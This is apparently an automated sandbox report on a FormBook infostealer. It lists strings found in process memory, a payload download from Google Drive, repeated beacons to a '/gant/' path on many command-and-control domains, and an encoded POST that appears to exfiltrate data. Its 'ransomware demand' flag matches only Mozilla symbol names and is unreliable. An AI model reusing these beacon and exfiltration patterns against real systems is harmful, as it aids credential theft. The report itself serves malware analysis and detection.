      Source: explorer.exe, 00000015.00000002.7463495574.00000000092AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3333082265.00000000092AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4213935321.00000000092AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4913976228.00000000092AE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000015.00000002.7494938106.00000000106D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217695794.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6278163280.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6469892848.00000000106D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6463904770.00000000106B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6449975060.00000000106AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4218507424.00000000106D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000106AE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?M
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000015.00000003.4925571910.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217695794.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6278163280.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6463904770.00000000106B7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4910827069.00000000106AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6449975060.00000000106AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7494297654.00000000106B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000106AE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?r
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.whatsapp.com/send?phone=2348166843763
      Source: explorer.exe, 00000015.00000002.7461360082.0000000009050000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3331984895.0000000009050000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com:b3
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: explorer.exe, 00000015.00000000.3361689711.00000000105D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
      Source: chkdsk.exe, 00000016.00000002.7454580415.0000000006D68000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: explorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comH
      Source: explorer.exe, 00000015.00000002.7501684681.0000000014A72000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457324652.0000000008120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/css?family=Fredoka
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/enti
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBm8qVB.img
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
      Source: chkdsk.exe, 00000016.00000003.3594082793.0000000005329000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3594082793.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: chkdsk.exe, 00000016.00000003.3594082793.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
      Source: chkdsk.exe, 00000016.00000003.3594082793.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: chkdsk.exe, 00000016.00000003.3594082793.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
      Source: explorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
      Source: explorer.exe, 00000015.00000002.7477724948.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6281492635.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6457507622.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4204846710.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4916954574.000000000CFD8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3347956862.000000000CFD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009C29000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 00000015.00000002.7461360082.0000000009060000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/wJQ
      Source: explorer.exe, 00000015.00000003.4198007620.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4194013776.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7484031378.000000000D15A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6455162737.000000000D17E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3351686119.000000000D15A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comx
      Source: explorer.exe, 00000015.00000003.6463374873.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4913724325.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7494938106.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3331984895.0000000009087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.4217399131.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.6449975060.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3363239963.00000000106FA000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: chkdsk.exe, 00000016.00000002.7454580415.0000000005F46000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gargaloid.ru/gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1K
      Source: chkdsk.exe, 00000016.00000002.7457453939.0000000009BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 00000015.00000000.3329042702.0000000004E24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7457215563.0000000004E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: unknownHTTP traffic detected: POST /gant/ HTTP/1.1Host: www.grenoble-informatique.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.grenoble-informatique.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.grenoble-informatique.com/gant/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 4f 51 39 69 31 73 30 61 43 5f 55 4b 71 55 43 37 4d 35 67 6a 52 70 36 6b 28 7a 4f 42 47 51 45 61 6d 56 67 49 75 67 44 69 69 74 56 4c 58 30 52 73 63 35 6f 4e 47 72 31 2d 6d 65 72 44 63 4d 32 6a 34 59 39 64 4e 66 49 73 31 2d 70 5f 31 32 56 67 58 50 4a 77 44 48 4d 32 6c 35 35 46 64 59 32 42 54 75 4f 6c 28 49 4a 56 67 74 74 79 53 2d 65 4e 6b 77 59 4c 4d 65 36 6c 31 51 6d 4a 4e 33 62 57 39 61 6c 74 62 6b 54 76 37 6e 39 4d 66 4b 6c 50 6c 6f 6f 4e 62 64 38 49 66 70 46 74 6f 66 35 77 49 36 67 6e 73 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: j-Jh9P=7LjXB9Ja86epOQ9i1s0aC_UKqUC7M5gjRp6k(zOBGQEamVgIugDiitVLX0Rsc5oNGr1-merDcM2j4Y9dNfIs1-p_12VgXPJwDHM2l55FdY2BTuOl(IJVgttyS-eNkwYLMe6l1QmJN3bW9altbkTv7n9MfKlPlooNbd8IfpFtof5wI6gnsA).
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: C:\Windows\explorer.exeCode function: 21_2_0DE7D4C2 getaddrinfo,SleepEx,setsockopt,recv,recv,21_2_0DE7D4C2
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0fultl13jo81v7hfp988qo08b984m263/1676311050000/07588391332409747894/*/1kMGYAplkbjctjdnlsJTgbdkYzAHnVHuE?e=download&uuid=0b7f7b61-8846-47e3-a792-0fa9790c296c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-2g-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.gargaloid.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.grenoble-informatique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.otopodlogi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1Host: www.flyshareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=UNNYdcSQH8G7azuEeyjHGvIpwoKghrgSH3Udh5NSOmta1bwA4yZMM4UvAxe/iGptPmuGT4M6JuNJB68yuzE0hMzX7pwOCu8H8A==&T9=bPxTYTKdI2 HTTP/1.1Host: www.performingartshub.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=HgCX1yPl02YVZ8ntsD2Fu2rJboCHorDOJXbMMq44vtOckm/otWVg58UmWCLCWofbQIl3m/yqZE5fIEBzZKMECrgvXJ6dLgzQIQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.brothersbears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=0t3ZvwpEqVsRCOwRlikXMWB7Ea95BZez04foFL6wYLCqffSg77P+YtyukHRVRGclol71et68nIyUJ+scOlPmXgSdPrpnjIlS4g==&T9=bPxTYTKdI2 HTTP/1.1Host: www.sciencevale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=/4uePDAndv7VRKlxJSWWYF+9JWnpnxC+Pqu0glR/gWphXDvAzD/IhhQUyrVK/VMLXFR13n1QlAsq5EiJSOA8G9jIKMVd5okpcw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=gtmxM9sVToXKjMyTASxBPF0sq9AFFQGD43p7DhxGmNljyvBNaufr2S5kOWNcewkSSruZtMGwxAitLcOH1ReRcd40xShNtBsThw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.cc564966.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=MQtjD5X22poUyMv7ES4tvtca33r9y2dLYuXFkx7pCBQejezRhizA21G5ExCHCl6M5sdibhXBm0qE1VdFv4a9rmk6iqpvFYiiMw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.thejointcomission.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.dachmotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1Host: www.gargaloid.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1Host: www.grenoble-informatique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=2tUZKRHByxlttwUxv+GOcisphN8ZGwJH956H6V+vFw98R8B9R+q1qFuRbo6W7NeIxARixWcpsfkmwl3+P8H59+TtZSMQFDV9NQ==&T9=bPxTYTKdI2 HTTP/1.1Host: www.otopodlogi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=kZeeE52Eo10vzDTOQ1ht8j81CNi5RiJJgw5DqHYq9Uu9KUllXVwDaVf8WWuhPaYSyfOYD/3vstXpbIR6gdGLFZ+mUJD/YhgA6w==&T9=bPxTYTKdI2 HTTP/1.1Host: www.flyshareinc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.11.20:49826 version: TLS 1.2

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000016.00000002.7447041468.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7446551643.00000000055C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Found potential ransomware demand text
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
      Source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
      Source: chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
      Source: chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@m